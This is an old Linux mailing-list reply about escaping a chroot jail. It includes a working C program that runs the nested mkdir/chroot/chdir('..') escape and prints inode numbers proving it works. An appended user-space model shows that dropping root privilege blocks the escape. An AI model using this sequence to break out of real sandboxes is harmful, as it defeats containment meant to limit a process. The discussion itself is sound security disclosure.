> On Thu, 2 Apr 1998, Jeremy Fitzhardinge wrote:
>
> > Robert Bihlmeyer wrote:
> > > Alan Cox wrote:
> > > >> mkdir("x"); chroot("x"); chdir("../../../../../../../..");
> > > >> chroot(".");
> > > You tried it? One will escape from x with that.
> >
> > Well, one was never really captured. I didn't notice the missing chdir,
> > but it's well-known behaviour that if you never chdir into a chroot jail,
> > you can easily "escape".
>
> You missed the point. You _are_ already in a chroot jail, this is how you
> escape from it.
>
> mkdir("foo"); chroot("foo"); chdir("foo");
>
> # you are in the "jail" now
>
> mkdir("x"); chroot("x"); chdir("../../../../../.."); chroot(".");
>
> # no more jail...

First I thought you were wrong because you missed the `chroot("/")'
after going to jail, which I thought was important in this case.
But, testing first before replying, I got the following output

/ 2053 2086
/ 2053 2086
/ 2053 2

from the output below which shows the inode number of the real /
so indeed it's possible to escape :-(

-------------------------------------------------------------------------------
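#define _GNU_SOURCE             /* for get_current_dir_name() */
#include <stdio.h>
#include <stdlib.h>             /* for exit() */
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    struct stat buf;

    /* enter the jail (needs root, as every chroot() call does) */
    mkdir("jail",0755);
    chroot("jail");
    chdir("jail");
#ifdef not_really_necessary_but_why_not
    chdir("/");
#endif
    /* print cwd, device and inode of "." inside the jail */
    stat(".",&buf);
    printf("%s %d %ld\n",get_current_dir_name(),(int)buf.st_dev,(long)buf.st_ino);

    /* ".." stops at the jail root, so this changes nothing */
    chdir("../../../../../../../../../../..");
    chroot(".");
    stat(".",&buf);
    printf("%s %d %ld\n",get_current_dir_name(),(int)buf.st_dev,(long)buf.st_ino);

    /* dig tunnel to escape... */
    mkdir("tunnel",0755);
    chroot("tunnel");           /* root moves below cwd; cwd stays put */
    chdir("../../../../../../../../../../..");
    chroot(".");
    stat(".",&buf);
    printf("%s %d %ld\n",get_current_dir_name(),(int)buf.st_dev,(long)buf.st_ino);
    exit(0);
}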
-------------------------------------------------------------------------------
Harald
--
All SCSI disks will from now on be required to send an email notice
24 hours prior to complete hardware failure!

Harald Koenig, Inst.f.Theoret.Astrophysik
koenig@tat.physik.uni-tuebingen.de
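
The sequence discussed in this thread, as an added example that is not part of the original message: a user-space model (it makes no syscalls) of how chroot() moves only the root while ".." is stopped only at that root, replaying the "tunnel" steps once with privilege kept and once with it dropped. The `struct proc`, the helper names and the `/home/u/jail` paths are assumptions made for the model; the privilege flag reflects that chroot(2) is a privileged call.

```c
/* Added example: a user-space model of chroot()/chdir(); it makes no syscalls. */
#include <stdio.h>
#include <string.h>
struct proc { char root[256], cwd[256]; int privileged; };
/* ".." is refused only when the walk stands exactly on the root (or real "/"). */
static void resolve(const struct proc *p, const char *path, char *out) {
    char buf[256], cur[256], *tok;
    strcpy(cur, path[0] == '/' ? p->root : p->cwd);
    snprintf(buf, sizeof buf, "%s", path);
    for (tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (!strcmp(tok, ".")) continue;
        if (!strcmp(tok, "..")) {
            char *s = strrchr(cur, '/');
            if (!strcmp(cur, p->root) || !strcmp(cur, "/")) continue;
            if (s == cur) s[1] = '\0'; else *s = '\0';
        } else if (strlen(cur) + strlen(tok) + 2 <= sizeof cur) {
            if (strcmp(cur, "/")) strcat(cur, "/");
            strcat(cur, tok);
        }
    }
    strcpy(out, cur);
}
static void do_chdir(struct proc *p, const char *path) {
    resolve(p, path, p->cwd);
}
/* chroot() moves only the root, never cwd; it fails once privilege is gone. */
static int do_chroot(struct proc *p, const char *path) {
    if (!p->privileged) return -1;      /* EPERM in the real call */
    resolve(p, path, p->root);
    return 0;
}
static int under(const char *jail, const char *s) {
    size_t n = strlen(jail);
    return !strncmp(s, jail, n) && (s[n] == '\0' || s[n] == '/');
}
/* 1 while both root and cwd are still at or below the intended jail. */
static int confined(const struct proc *p, const char *jail) {
    return under(jail, p->root) && under(jail, p->cwd);
}
static int tunnel_attempt(int privileged) {
    struct proc p = { "/home/u/jail", "/home/u/jail", privileged }; /* constructed */
    do_chroot(&p, "tunnel");
    do_chdir(&p, "../../../../../../../../../../..");
    do_chroot(&p, ".");
    return confined(&p, "/home/u/jail");
}
int main(void) {
    printf("root kept: %d, dropped: %d\n", tunnel_attempt(1), tunnel_attempt(0));
    return 0;
}
```

In the model the process stays confined only when the second chroot() is refused, which is why a jailed process should give up root right after `chroot()` and `chdir("/")`.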